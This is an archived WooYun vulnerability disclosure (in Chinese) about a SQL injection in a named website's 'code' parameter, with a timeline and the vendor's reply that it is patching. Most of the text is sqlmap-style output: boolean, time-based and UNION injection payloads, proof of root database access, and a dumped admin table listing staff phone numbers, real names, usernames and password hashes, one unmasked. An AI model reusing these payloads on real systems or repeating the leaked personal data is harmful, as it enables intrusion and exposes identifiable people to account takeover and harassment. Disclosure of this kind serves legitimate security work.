乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-06: 细节已通知厂商并且等待厂商处理中 2015-05-06: 厂商已经确认,细节仅向厂商公开 2015-05-16: 细节向核心白帽子及相关领域专家公开 2015-05-26: 细节向普通白帽子公开 2015-06-05: 细节向实习白帽子公开 2015-06-20: 细节向公众公开
233
http://www.daimayi.com/index.php/Apply/get_census?code= root权限!
Parameter: code (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: code=') AND 8266=8266 AND ('dsZz'='dsZz Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: code=') AND (SELECT * FROM (SELECT(SLEEP(5)))smIz) AND ('qvdz'='qvdz Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: code=') UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x454c55726d6641706e4c,0x716b716a71),NULL-- ---web server operating system: Windowsweb application technology: ASP.NET, PHP 5.5.7back-end DBMS: MySQL 5.0.12database management system users [1]:[*] 'root'@'localhost'available databases [4]:[*] huomayi[*] information_schema[*] mysql[*] performance_schemaTable: t_admin[7 entries]+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+| id | role_id | sex | status | telphone | password | add_time | true_name | user_name | work_number |+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+| 1 | 9 | 0 | 1 | 15529182520 | 585f1869b32b5**968156a0a6b287b1e | 1407848436 | \\u7ba1\\u7406\\u5458 | admin | 001 || 10 | 7 | 1 | 1 | 13892365487 | 324cb56bb63a0***47957db3fea0ce76 | 1430102269 | \\u5f20\\u5353\\u5a05 | xiaozhang | 031 || 6 | 7 | 1 | 1 | 13893250038 | baaada81ff8c86a**942f05a1e5b6c33 | 1427850240 | \\u674e\\u5a1f | xiaoli | 011 || 7 | 8 | 0 | 1 | 13985689234 | d5f79627803de***e7065236da96c35b | 1427969895 | \\u5f20\\u6ce2 | zhangbo | 002 || 8 | 8 | 0 | 1 | 18009172450 | b033ae32a829c0d4d3b3d2c26dd721de | 1428408503 | \\u738b\\u6c38\\u5174 | xunxing | 003 || 11 | 7 | 0 | 1 | 11111111111 | e45a350aa8d46b***08763425a93c683 | 1430707389 | \\u6d4b\\u8bd5\\u5e10\\u53f7 | liudaye | 123 || 9 | 7 | 1 | 1 | 18691733337 | 3b0fc589201c991****2ac9f54e5cd02 | 1428890116 | \\u738b\\u5a77 | wangting | 032 |+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+
密码估计早已被泄露,记得改密码!!!
危害等级:高
漏洞Rank:12
确认时间:2015-05-06 16:51
已经修改信息,技术人员已在修补漏洞,谢谢!
暂无